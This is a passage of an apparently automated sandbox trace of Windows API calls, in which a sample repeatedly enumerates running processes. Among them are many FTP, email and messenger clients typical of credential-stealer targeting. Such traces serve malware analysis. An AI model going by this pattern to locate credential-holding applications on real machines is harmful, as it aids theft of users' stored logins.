th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0286.767] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0286.769] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.772] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.774] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0286.776] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0286.828] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0286.830] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0286.833] CloseHandle (hObject=0x2170) returned 1 [0286.833] Sleep (dwMilliseconds=0x64) [0286.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0286.990] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.992] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.994] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.996] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.001] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.003] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.005] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.007] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.010] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.017] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.019] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.021] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.023] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.025] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.036] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.038] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.040] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.042] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.048] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.050] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0287.052] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0287.054] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0287.056] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.059] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0287.064] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0287.066] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0287.068] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0287.071] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.073] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.090] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0287.092] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.094] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0287.095] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0287.097] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0287.098] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0287.100] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0287.101] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0287.103] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0287.104] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0287.106] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0287.110] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0287.112] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0287.114] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0287.115] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0287.116] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0287.118] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0287.119] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0287.121] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0287.125] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0287.126] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0287.149] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0287.150] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0287.152] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0287.154] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0287.155] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0287.156] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0287.158] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0287.159] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0287.161] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0287.163] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0287.165] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0287.166] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0287.168] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0287.172] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0287.174] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0287.176] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0287.178] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0287.179] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0287.181] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0287.183] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0287.273] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0287.276] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0287.279] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0287.282] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0287.284] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0287.287] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: 